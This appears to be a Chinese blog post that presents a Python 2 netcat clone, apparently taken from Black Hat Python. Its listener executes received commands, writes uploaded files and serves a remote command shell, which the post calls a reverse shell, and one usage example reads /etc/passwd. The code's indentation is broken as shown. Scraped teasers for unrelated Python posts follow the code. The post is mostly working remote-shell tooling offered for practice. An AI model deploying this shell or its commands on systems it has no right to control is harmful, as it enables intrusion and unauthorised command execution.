【Python】Part1 應用1-Netcat

阿新 • • 發佈：2018-05-13

stderr commands == -i server %s rip 文件反彈shell

01 簡介

netcat的主要功能是通過tcp或udp協議傳輸讀寫數據。

下面代碼用python編寫了tcp客戶端，服務端，從而實現上傳文件，本地執行命令，反彈shell三種功能。

02 代碼

  1 import sys
  2 import socket
  3 import getopt
  4 import threading
  5 import subprocess
  6 
  7 listen                = False                                                #judge flag: client or server 

  8 target                = ""                                                    #client: target_host(default = localhost), target_port                                
  9 port                = 0
 10 upload                = False                                                #server: 3 functions of server 

 11 upload_destination     = ""
 12 execute            = ""
 13 command            = False
 14 
 15 #-------------------------------------------------------------------------------------------client: target_host, target_port
 16 def client_sender(buffer):
 17     print ‘=========client   on ======‘ 

 18     client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)            #c-1 socket
 19     
 20     try:
 21     client.connect((target,port))                                        #c-2 connect
 22     
 23     if len(buffer):
 24         client.send(buffer)
 25         
 26     while True:                                                            #c-3 loop = handle;    handle = send + recv
 27         recv_len = 1
 28         response = ""                                                            #get response from server
 29         
 30         while recv_len:
 31         data         = client.recv(4096)
 32         recv_len     = len(data)    
 33         response     = response + data
 34         
 35         if recv_len < 4096:
 36             break
 37         
 38         print response,
 39         
 40         buffer = raw_input("")
 41         buffer =  buffer + "\n"
 42         client.send(buffer)
 43         
 44     except:
 45     print "[*] Exception ! Exiting."
 46     client.close()
 47    
 48    
 49 #-------------------------------------------------------------------------------------------server: 
 50 def run_command(command):
 51     command = command.rstrip()
 52     
 53     try:
 54     output = subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True)
 55     except:
 56     output = "Failed to execute command.\r\n"
 57     
 58     return output
 59     
 60     
 61 def client_handle(client_socket):
 62     global upload
 63     global execute
 64     global command
 65     
 66     if len(upload_destination):                                              #type1 upload
 67     file_buffer = ""
 68     
 69     while True:
 70         data = client_socket.recv(1024)
 71         if not data:
 72         break
 73         else:
 74         file_buffer = file_buffer + data
 75         
 76     try:
 77         file_descriptor = open(upload_destination,"wb")
 78         file_descriptor.write(file_buffer)
 79         file_descriptor.close()
 80         
 81         client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
 82     except:
 83         client_socket.send("Failed to save file to %s\r\n" % upload_destination)
 84         
 85     if len(execute):                                                    #type2 execute(local)
 86     print execute
 87     output = run_command(execute)    
 88     
 89     client_socket.send(output)
 90     
 91     if command:                                                        #type3 command(remote)
 92     while True:
 93         client_socket.send("<BHP:#> ")
 94         cmd_buffer = ""
 95         while "\n" not in cmd_buffer:
 96         cmd_buffer += client_socket.recv(1024)
 97         
 98         response = run_command(cmd_buffer)
 99         client_socket.send(response)
100     
101 def server_loop():
102     print ‘=========server   on ======‘
103     global target
104     global port
105     
106     if not len(target):
107     target = "0.0.0.0"
108     
109     server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)        #s-1 socket
110     
111     server.bind((target,port))                                                #s-2 bind
112     
113     server.listen(5)                                                        #s-3 listen
114     
115     while True:                                                            #s-4 loop = accept + thread(handle) + start    ;    handle  = recv + send
116     client_socket,addr = server.accept()
117     client_thread = threading.Thread(target=client_handle,args=(client_socket,))
118     client_thread.start()
119     
120 #-------------------------------------------------------------------------------------------main
121 def usage():
122     print "BH Net Tooll"
123     print
124     print "Usage: bhnet.py -t target_host -p port"
125     print "-l    --listen        -listen on [host]:[port] for incoming connections"
126     print "-e     --execute=file_to_run    -execute the given file upon receving a connection"
127     print "-c    --command        -initialize a command shell"
128     print "-u    --upload=destination    -upon receiving connection upload a file and write to [destination]"
129     print
130     print "Examples:"
131     print "bhnet.py  -t 192.168.0.1 -p 5555 -l -c"
132     print "bhnet.py  -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
133     print "bhnet.py  -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
134     print "echo ‘ABCDEFGHI‘ | ./bhnet.py -t 192.168.11.12 -p 135"
135     sys.exit(0)
136     
137 def main():
138     global listen
139     global execute
140     global command
141     global upload_destination
142     global upload
143     global target
144     global port
145     
146     if not len(sys.argv[1:]):                            #1 parse args
147         usage()
148 
149     try:
150     opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
151     except getopt.GetoptError as err:
152     print str(err)
153     usage()
154     
155     for o,a in opts:
156     print "opts:" + o + "    args:" + a
157     if o in ("-h","--help"):
158         usage()
159     elif o in ("-l","--listen"):
160         listen = True
161     elif o in ("-e", "--execute"):
162         execute = a
163     elif o in ("-c", "--commandshell"):
164         command = True
165     elif o in ("-u", "--upload"):
166         upload_destination = a
167     elif o in ("-t", "--target"):
168         target = a
169     elif o in ("-p", "--port"):
170         port = int(a)
171     else:
172         assert False,"Unhandled Option"
173         
174     if not listen and len(target) and port > 0:            #as a client
175     buffer = sys.stdin.read()
176     client_sender(buffer)
177     
178     if listen:                                            #as a server
179     server_loop()
180         
181 main()

【Python】Part1 應用1-Netcat

stderr commands == -i server %s rip 文件反彈shell 01 簡介 netcat的主要功能是通過tcp或udp協議傳輸讀寫數據。下面代碼用python編寫了tcp客戶端，服務端，從而實現上傳文件，本地執行命令，反彈shell三種功能。

【Python】UI自動化-1

nbsp val 管理腳本在線使用 () ESS rom 一、安裝selenium和環境配置 1 pip install selenium 2 三個驅動文件放到d:盤根目錄 3 安裝火狐版本33 4 安裝插件：selenium ide\firebug\firepath

【Python】程式設計筆記1

一、概述 Python 提供了非常完善的基礎程式碼庫: 覆蓋了網路、檔案、GUI、資料庫、文字等大量內容，被形象地稱作“內建電池（ batteries included） ”。 ==》許多功能不必從零編寫，直接使用現成的即可。特點：“優雅”、 “明確”、 “簡單” 編譯執行

【Python】正則表達式1（未完）

pes mmu get regular rop 則表達式 line out github 1、正則表達式唯一的用途就是在文本中匹配和尋找模式，模式可以簡單，也可以復雜。 2、Regexr 這個網站很個性的就是，有一個community標簽，打開後可以看到評分由高到低

【Python】06、python內置數據結構1

python list 一、數據結構與獲取幫助信息1、數據結構通過某種方式（例如對元素進行編號）組織在一起的數據元素的集合，這些數據元素可以是數字或者字符，甚至可以是其它的數據結構。 python的最基本數據結構是序列序列中的每個元素被分配一個序號（即元素的位置），也稱為索引：索引從0開始編

【python】（第一章）1.4 數字和表達式

python以下內容是我學習《Python基礎教程》第2版這本書所寫的筆記轉載請註明出處1.>>> 2.75%.50.25【不同】C語言中取余運算必須為整數，不能是浮點型2.>>>（-3)**29【不同】C語言中pow (double x,double n);(將返回

【Python】數據庫練習-1

所有 not ron creat 索引 rom jin lec innodb 三十四數據庫 1、查看數據庫命令 2、使用某個數據庫 3、查看當前在哪個庫 4、查看當前數據庫中有哪些表 5、查

【Python】爬蟲-1

css encode HA res htm 引用 pre 響應 con #練習1：獲取搜狐網頁上所有的URL並且把與籃球有關的內容篩選出來 #算法： #1、獲取搜狐網站所有內容 #2、判斷哪些是鏈接，獲取URL格式有效的鏈接 #3、獲取每個有效URL網頁的內容 #4、判斷

【Python】unittest-1

span 一個點 and python path ear ssm color self. 一、Unittest 單元測試將測試結果和期望值作對比（1）繼承（2）引用包（3）執行一次test就會調用一次setup和tearDo

【python】GeoJson和bokeh-1

GeoJson 文件 { "type": "FeatureCollection", "features": [ { "geometry": { "type": "Polygon", "coordinates": [

【python】練習1

1.列印星星 1） * ** *** **** ***** end='' //不換行 print() //換行 2） * ** *** **** ***** 3） ***** **** *** ** *

【Python】Python實現N級臺階，一次可以走1步，2步，3步，一共多少種上樓梯方法

去面試的時候，筆試題有一個二選一，有一個是這個問題，當時選的另一個，現在實現下這個臺階問題。如果只有一級臺階，那麼方法只有1種，如果是有二級臺階，那麼方法2種，如果三屆臺階，那麼實現方法有4種。如果臺階數再增加，大於三屆臺階以後，可以認為是隻有一二三級臺階的一個重複實現，可以使用遞迴的方

1、【Python】Python 3入門(簡介/基礎語法/運算子/變數/資料型別/位元組)

一、簡介 Python 是一種高層次的結合瞭解釋性、編譯性、互動性和麵向物件的指令碼語言。Python 由 Guido van Rossum 於 1989 年底在荷蘭國家數學和電腦科學研究所發明，第一個公開發行版發行於 1991 年。特點：易於學習：Pyth

【Python】with及上下文管理器的原理和應用

這篇部落格主要總結with用法，自定義上下文管理器，以及__exit__的引數相關內容。 with 語句是 Pyhton 提供的一種簡化語法，適用於對資源進行訪問的場合，確保不管使用過程中是否發生異常都會執行必要的“清理”操作，釋放資源，with 語句主要是為了簡化程式碼操

【Python】django報錯：TypeError: init() missing 1 required positional argument: 'on_delete'解決辦法

錯誤程式碼： from __future__ import unicode_literals from django.db import models from django.utils.encoding import python_2_unicode_compatible

【python】實現對 2:3 或者3:2的圖片進行1:1裁剪

每張圖片裁剪三次，實現argument ，並resize成256*256。 from PIL import Image import os for pic_name in os.listdir("/Users/wangyouzhuo/Desktop/pooma_new/

【Python】matplotlib畫圖設定標題、軸標籤、刻度、刻度標籤（系列1）

摘要資訊視覺化（也叫繪圖）是資料分析中最重要的工作之一。它可能是探索過程的一部分，例如，幫助我們找出異常值、必要的資料轉換、得出有關模型的idea等。另外，做一個可互動的資料視覺化也許是工作的最終目標。Python有許多庫進行靜態或動態的資料視覺化，但我這裡重要關注於matplotli

【python】詳解numpy庫與pandas庫axis=0，axis= 1軸的用法

對資料進行操作時，經常需要在橫軸方向或者數軸方向對資料進行操作，這時需要設定引數axis的值： axis = 0 代表對橫軸操作，也就是第0軸； axis = 1 代表對縱軸操作，也就是第1軸；

【Python】 @classmethod 在實際專案中的應用

主要內容在專案中，多數作用於獲取專案配置檔案的配置屬性。例如，需要編寫一箇中間件test，程式碼如下 class A(object): def __init__(self, parms): self.parms = parms

CodeWars題目訓練1【Python】

題目：Multiply 等級：8 【最低一級】介紹：The code does not execute properly. Try to figure out why. 翻譯：程式碼不能正確執行，想辦法知道為什麼。【可自行機翻】正文： def

【Python】Part1 應用1-Netcat

相關推薦